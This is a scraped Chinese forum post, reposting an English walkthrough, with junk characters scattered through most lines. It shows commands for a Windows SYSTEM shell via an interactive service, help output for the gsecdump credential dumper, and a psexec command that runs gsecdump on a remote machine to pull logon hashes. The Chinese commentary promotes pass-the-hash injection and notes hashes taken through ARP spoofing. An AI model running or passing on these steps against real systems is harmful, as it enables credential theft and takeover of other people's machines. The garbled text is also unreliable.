o get a DOS Prompt as NT system:7 l' z' W: Q$ u( g. M* ?2 C+ Q# n
# W. E, L# r- p9 M0 {: j; v& E6 Q6 ?C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
! A& s b, x0 K/ {* k. x[SC] CreateService SUCCESS- K$ a6 F: @3 C
) k. |5 }4 T6 n) KC:\>sc start shellcmdline
, K3 l: V* T1 |, ?[SC] StartService FAILED 1053:
* p( R3 C9 g$ y4 X* o$ y5 b
! M: }$ T$ r& K' ^/ s2 LThe service did not respond to the start or control request in a timely fashion., e0 f) ~) F1 \; V }1 l0 ~
4 o7 r6 E7 s* B7 `5 M* cC:\>sc delete shellcmdline
( H% }/ M- M$ L# ~+ m" X[SC] DeleteService SUCCESS& s. H& v8 o; W: |7 [2 [
6 z, N, V, q. G------------4 [1 ^4 \6 `! I1 ^* J
# c- S8 ?/ M* \, S! P9 o
Then in the new DOS window:1 J! R8 N7 z/ Z
# c% r0 J# S8 F0 u3 m8 AMicrosoft Windows XP [Version 5.1.2600]! h# X2 x# Z, J3 r
(C) Copyright 1985-2001 Microsoft Corp.
1 L3 \0 w4 S* z1 G) A% U. h& s$ s& ], h2 e8 W( Q. X
C:\WINDOWS\system32>whoami
a% n" V; o; JNT AUTHORITY\SYSTEM
, W3 Q7 Z& R( Y b% }, Z
( M2 M4 B2 e0 X$ j/ L& ]C:\WINDOWS\system32>gsecdump -h+ C9 D! b$ C. \7 j6 I
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
, R; p5 o) s+ g, `: n: |$ Y5 [usage: gsecdump [options]
/ i" @5 X% Q; L: [
9 k: r, l* |; ~6 h2 i8 qoptions:" i0 L5 \' t1 z0 R
-h [ --help ] show help) \8 @& Y: Y" G$ E: Q
-a [ --dump_all ] dump all secrets
4 ^( v/ f. F% ?3 b" V0 r2 D0 ^0 H# k3 m-l [ --dump_lsa ] dump lsa secrets: P: }# ?, H7 ^9 g; i
-w [ --dump_wireless ] dump microsoft wireless connections- y4 ~1 {! Y! t3 [" ?
-u [ --dump_usedhashes ] dump hashes from active logon sessions& r9 d# ~* A; \# O7 {
-s [ --dump_hashes ] dump hashes from SAM/AD
- H: ^( B8 |# j. m$ j+ E! d- @& C8 u P0 _ }, @
Although I like to use:; E* o# k/ n8 R- f
7 ~& J: `9 Y9 L3 J2 i6 W/ g$ Y' ?PsExec v1.83 - Execute processes remotely. K# a2 {8 d4 A" W
Copyright (C) 2001-2007 Mark Russinovich
% P! v1 |0 ~( w% `# ?Sysinternals - 链接标记[url]www.sysinternals.com[/url]. B/ c- @, p5 R& J6 \. o' @
8 p4 i6 o, ^2 Y* _9 YC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
+ h) z8 U! O/ _
4 W# ?1 ]2 h0 A. R$ X9 ato get the hashes from active logon sessions of a remote system.
9 E b: J; v/ s5 T
0 B. A' T. @2 i8 }/ y* ?9 }8 x7 k. BThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
' `7 `$ j0 n* \. E1 k1 H- s9 Y, B; f
5 w) t* h+ i* P提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
' Z3 F1 q5 }$ X7 N2 O. L原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
; ~' Q, k h' V& _4 L, m9 a$ @* A/ _) H
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
3 B& t3 J& K2 ]0 E' E& x3 {, w* ] |
发表于 2012-11-6 21:09:29
收藏
支持
反对